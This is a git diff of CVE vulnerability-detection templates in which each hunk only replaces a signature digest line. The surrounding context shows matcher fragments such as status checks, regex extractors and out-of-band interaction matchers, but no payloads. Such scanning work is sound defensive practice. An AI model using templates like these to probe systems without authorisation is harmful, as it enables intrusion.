490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2dc206e80ff2c88040bf883e7489d77bd7a4ba89169ffe9abf27e1cf41829d20220116954a4772401f7f08bfc31ae8cc97d5589219a8c1386e5cf7e1b7ccb784c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index d946f96fb6..1171afbe2b 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d36f0cf10b4c76f9ddc3bb3bb99e19b442a442dbe42041c7080344d95511da10221009ae56c847e4af6da7ee99e2fb6a713871b9b4c4f18e7a250accfcbe539bedefb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 9348bd038d..301f11c503 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a6b7e8c995a799eab6dbf7031c3c8bcc9cdbe807226b75b4891480a2fe957e6022100ea28cec825f736a274cd6c45321539c8711f0ee8c903afa10db4c2eea1c100df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 83d6bb74ef..62fbab1f27 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -63,4 +63,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body -# digest: 4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b99d22bd9041fb52ab13aa83d2e997290b17108448b7cbf376053179bd36bee022100ca8607aa86f35144000ea54bac59cc3ac464d1f0f8d3943df0365a02f45c3777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index e8c2507f0a..0f7d610d84 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -94,4 +94,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fb9d98df795d9808e6862bf4bd9bcb07827c6485050f18ef70a560a6f72c59202206fcce136e7f27d758cba9d444d64704b998c3469b1ee42efdd81942157b76359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f8ca012e45f5c9e01882720401edbd09af0f5fd78ac8b1c231ed983309dce380220313b5fc0157ac972eeda44e2aadeddae294cd8d26c93000fa892cb952195506f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index f7281998c8..6581315c5b 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220232dad6106246e48af27d4140906ad837429c3773f1b6f07ea2a498658394780022100a679963118929eb91997fffc431f95c3fad89464666e87470d287e74825577a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100add2fe38fb27afe8989f0cbd32e14563f1e1b7612526af6dd5d1c723b1b83a1a02210098a88773debb9a23aab1fcd53e0923b246a94a139d5f4f79dade985bfa73f5fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 5a45e0c1fc..cdfecc4579 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and -# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e93bb93d776a768ecf483221f92c3e95181cf2c0512c41f08b8ec201eabf7b10220373734ce19d8d990ad2571baaf3e154dd70515ef6699bdeb7455a1c8d206fc85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 8ddeda2511..d498bdb3d7 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f134a1bb31a5f1819448929d1f5a1fb7607689bb3287e0c57970f3ed9b28dff0220487bb1df45ffa1fcc0ccf07cee500d7a022f69f26bd37a565410b759560a2ea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af0669472ee6d120050a756ec247ac4624b4af1627bc9ac9d281331807de32a102210087a3d897f3438b97c0d8112ea154d4f2978a86367008dc2ea10aea18683af8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index d679522076..c391252e5f 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220670cb57e3fae58b67b36bab6ba5d2bc561838e5acd2e94af09eb440761a29dc002201569feec0d7b5543989deae7767a3f8feb7b44f81658e35a09cfffb100e2119c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027d75fdadca9437abc6131d2b609906c1cb927065cfadb69156b64c33f157ad402202d21e0e5dbc0a324e8ffca5f84781731af8c0ffd88e27536dd806221d76f3427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index f075b6d22c..bfc3013b37 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210087c8cc23306c003d3014cabcd4c3cb912e3c4d87482a41215320d2f95b58eda30221009c6e8471eaa49ae0b54f6509e968ff4afd28159693426f81124b8e14abc37fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015b28883b6b7bd8542fc6c3db1f9ed069c5e798dcf8404b8cf598686615b7d4702207a8fd46c908df97e8a8f0aaf59559c77493d7d80fc2dbeb1a377c71d9c0516a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 5504605411..4b06d65837 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e338922cb8b551aff81b4174eeb54b3d03de0063dcba852a37d9e56fca5b6aac022100889322591e888230de5003fd765440786e4839255f6b01983ec19666b8e127f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060906f5a13e7c9a79ec2f3046802a8847f412fde4539fe308415d82de26ec2880220648670c021a3d7303ba5f0f58d215957aa04ef13aea6d528f7081ae2a2baf80f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index c78b2cb21c..927eacdbd7 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e05cf25baf8a7125ea91ca95e393436d8cb7d2602aa6e808cde865dc2fd9a3a022068baef15fbd64e8b03a59d088a802bf3f07555c90cd55279942b9b70dc5a29f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bfe98d7bc2..197400d710 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -70,4 +70,4 @@ http: part: header words: - "OFBiz.Visitor=" -# digest: 4b0a00483046022100e04458e25cbecebcd58811ac23c6174bce44be12837d57ec0e89d7cbf3f996ac02210094dd842930966ba832f8c767196969e556ed6c5dae58db9b461e66f7eefa4786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220074ac64f44417a7f6d8430a2c662eea374d6863ce79c50927936aa5ec00819b702204b704ebae3b0d400f855b7630f79aae12a9179fbc624517b2ba41c27110eba32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 7508d6e350..898b06b8b6 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -64,4 +64,4 @@ http: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' internal: true -# digest: 490a004630440220212c67e7bb70c702c7016c3707bc652545339b2bf7432cd9856554bf94c4aca7022059f173bc4a50d952ad2daecb41b5db846709ffa51383e8c68eec3f1232702572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebdd70d8922b70f58039980363aed0ef6b5f50c9ea4d53ae9190af3e2727f8af0220299dfb21583a5b4b45ad99f1699e641d9690b2a11068e94e8a967f5de14b09dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index e1273b45ce..8beeb14157 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b48ac40178577233170a5f266ee2c7b513aa37f7b23a52a482a075b66751079022100cb0c07b43883f3e7f17d94e7c61f0729594cc79ccec51c2470e9060313d1e9ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098e7757e0209c423c0f1d06f2a709c9a2fbb69786899327e00431406bc1f66bf022100d79b72cb3177fc66ea667fdcef9bedab883b9acdac3ab0dcafadf79321973aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index df0d84a9e6..1a2d55960e 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de4f3b4ed15065e56c997e9902b14cb33d4129c1fb25571d30298239f4010e06022100fa3448fec140203342018294e9bf58e1e1d07baf5de4a681410bfbfbef4c29f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index d6a8460175..fb201e8353 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015c16d5c72f64fa026e48a1f863962d923527709b62ec881a563bccc792ff84a022010b46416ae8abc326958a0fd90e2df9159f95afb4615b86068dc15bd734ea504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220490c345e373b59329ef33f2390100f0df9533e5f3f4e3d9f3f88a59a8189081d022100b0d39ad57c7acdf202b65e6d69ce910e585bba593dbeee4178d6d33e08a42380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index f3a73b8679..78871d4c0c 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebda609c7ab89f085291e361b7d1484576e1270e57d3c66c3086a510088bf420022100dd880ddaa420f7476ba79dc50f12cbc0f7d5c2a225b28a3654c575a703e4838e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c8db9275a2a06cc7c1163e7262105ee0b9dfa2a6a733853ceb08c2d859e0584022100c6421baa661ba03a6ed0144bf811fadf8929e70f64b84737037435723f75e8d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 69ea7ecfe0..5bcdcb6729 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220739717cfdce2e0373ef8d65dd1d94307d5cf47b90e78cece9ded1ece8cdfd6a302206eb0c5526d9b799bfea075230f373f32f084be5be819bb53d6ec0d0d96596dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index e9034cf85f..70fb97f4f7 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203d036295d63d5d610dc81aba6f9e643f94d7bb641f9bc100917c9304a6f54d92022100b35b31dbc0d9ebd8c0652ad91f58d1361d486a199a81ec03cb8f4d2e1a692bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 580f90c681..b7da1fbc9e 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c87a96a99fe91bc4f66db14b729c4c3899aaf8dc807d296ffc2ba25bf8b5e645022005527effb1edd34301335e3af7e55c9d52becdc54ef12a67bb08a563b3fd13bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index aaa515527c..29c3843bb7 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 943ccdb933..adb48b1905 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009797e9869eb4d890a89391acc0795035af747ff5958931398e1e077d3f751e79022100d9e31261c293f7762348e4477ec1478a4f49a059fc8e4f1f513e7cfb025edb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index bf34d7d00f..fa759aecbd 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 7ad3ed0325..3d3f2288f5 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b72158929a2c012eca6ad612ac51258afbd4964fc02c47f4b57368e7cf0bedd30220196fa0ae9b42667f6ed26e6b60c4a741f049d9d05d86ccd0dcdddfcb0b8641c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faeb3156ba858fe91b062d14f9c7622c40a8e4bba7714ac68ecfea69a67a47a702210092f42640d23791838f59f78bbf5479a1d62585cc6c14413a4c69900d8c77664f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index ee1176c56c..a7a43ae8dc 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -54,4 +54,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f4700c344cded0ad1a76552a9cf723498805f3c1e80942e9fe989eb0e82b3a190220531cf864289a0b38c68f30881e3ab85365460eef963c5154907c7913af1934e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index c59651b4f6..357e052f09 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f69ec7d4711d599dd40f92495d22b5d93ac3a8db167fe425f7b024ff41d888c5022030ad77de1858a49de1ff57b58e699741fa419442f186dd2a419fa4f433ee8138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009da7701be9e699d6c8cfb7d6d502b67994b8bd7588fd3ba31d79fc30acfb5728022100f0c66ec762d48b3c4f2408958cf655a1d696afca93ae85b154898eb472980951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index b3819d8e07..fa614240e8 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048a943d90a79828cac930da23344723c90a9d4a5727d06e79cd2c6d9c422436e0220447a0b022e0d5f3632a8ffe251db457d67ffd60af93d8fcd1f2bc98c0366fbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 445e72d342..752a20d476 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - "(u|g)id=.*" -# digest: 4a0a00473045022100e84f3b6f3b4431895a29b93f5706225e723a3306c1a1fba02583aeacd7fd802f02200c4f466848e8a98fdcc690f9d5d193830228d10b8759a412ce478da775f757dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d12966b1837ef6ccf87ca6cd55eec8ab9d3b1d87066521af750080b7e25e55ac0220447bd0e552edb4a0fa9e2d31875661ace5d12e7ae449c671af07dd4396739ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index fb6b0b26d1..7d5d610fa2 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - '(?m)Pega ([0-9.]+)' -# digest: 4b0a00483046022100bb3eb39482e6bae705caa5decca90a113164e112f360860f41ae3844effb25f3022100cbc7eeb4828f6198e465d2bec97ac6562e793c7c9b76a52e1c830319059eb040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b98e70d836aeed9b41fe32d38b8f9e0a504b1f330bbb68477296e6c3008506a1022100fc8c661b92d136d56605ae5a3207598bacde65e1a1091a2b637972bcfaac7e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index a407f4f20d..f5093d00c2 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acd1dd610e280bd360171a8b76652c445a5e7419324dbf618684f72477baff5d022100b980579bec70c2df8580259a9dd5bc729c801c7bea36b518f3933cd07aa9e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index a52441a726..c9da525f28 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -67,4 +67,4 @@ http: - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' internal: true part: header -# digest: 490a00463044022070f0c04ecf3a9fd26ce9b1691219435ab15f0cd55e185ba3586553743c17e82d02205e3a8a905f69891dc2c1c5b7651a0e91c63afc906d36ebdcd6425467650c5ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8ffedc5739f5ba604e32ca31e2ad0b8cd71050b9f83a9130538b124d0214942022100a2a90ced963bfbebff12db8025096d4055d41266b679c34002ff41e212cc6396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 81332d6f7a..d21940af9c 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -57,4 +57,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a00473045022100a5eeed4aa78e0ab67f4cc386a9ff9940e1bf79af086160f50cfcb22b541c6ac2022077db0dfda45ed661c6094d7fc069db330ff5e1854903adc81a368722db443bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018a1380d7f6879c31c55d6a19a3ab98cce3b9bb4fc0cfd3f9f24b2a7ac7d1f1c022100d168841e4ff2477c158fb403078752b4f71a8977387de03062fc0fabcd80f130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 5d3ffad92e..d4025871ed 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd30c5e0ce9daa91aafda8c85d31f33bff251466bf3d916601d92ca50549acea022100feac624da9d405aac50e6dfeeef41d8e03baaa2f6a8b76950df8dcca1fa92f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index b408a5d4aa..e029bd6067 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450220581131eca2ef63301253ff49449855879636bad0e9afd4bbc06992068f084b32022100e42d20545e6f7a6ff2aaa16ec56637fab0aac6462036f42fe6dec31c13882d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b7b1482c51b891f719a691f34c8f18c1b22e51f7767abd5de84aaddb042f352022100e59e7bd6c6eea0222eab89ab3871c6c3b1705b428f0ef77e9c226ae77b8cd0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 1a04e7cb59..d1aa4dd68e 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c210e8ed390ead0950a65257b8d9b9eed6a403b4234fe537f30c7d0529e9aad70220287ac350869e7bbabb19928f08ff35cffd9808b6371815e3dd78e9e0e64d7cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028bc49aed0dad70ffa655f7fa36fda9a12a2f1f64120ec110f2b6a4b9bc6e701022100aa4a3250ab4373785c6a72a5f0c696f99342c751e8d67ebca79254dbebae9f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index e60e497167..7cce0fa123 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -59,4 +59,4 @@ http: - "contains_all(header, 'application/xml')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100886a031dbb45bd2585021ea2d7ea51b4bd28d2403afa70cd92fc253a0cb7d5cc022038e2460485ace429f2ae598ca2073cb289cfbe470e28f479fea812fe0e7abdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 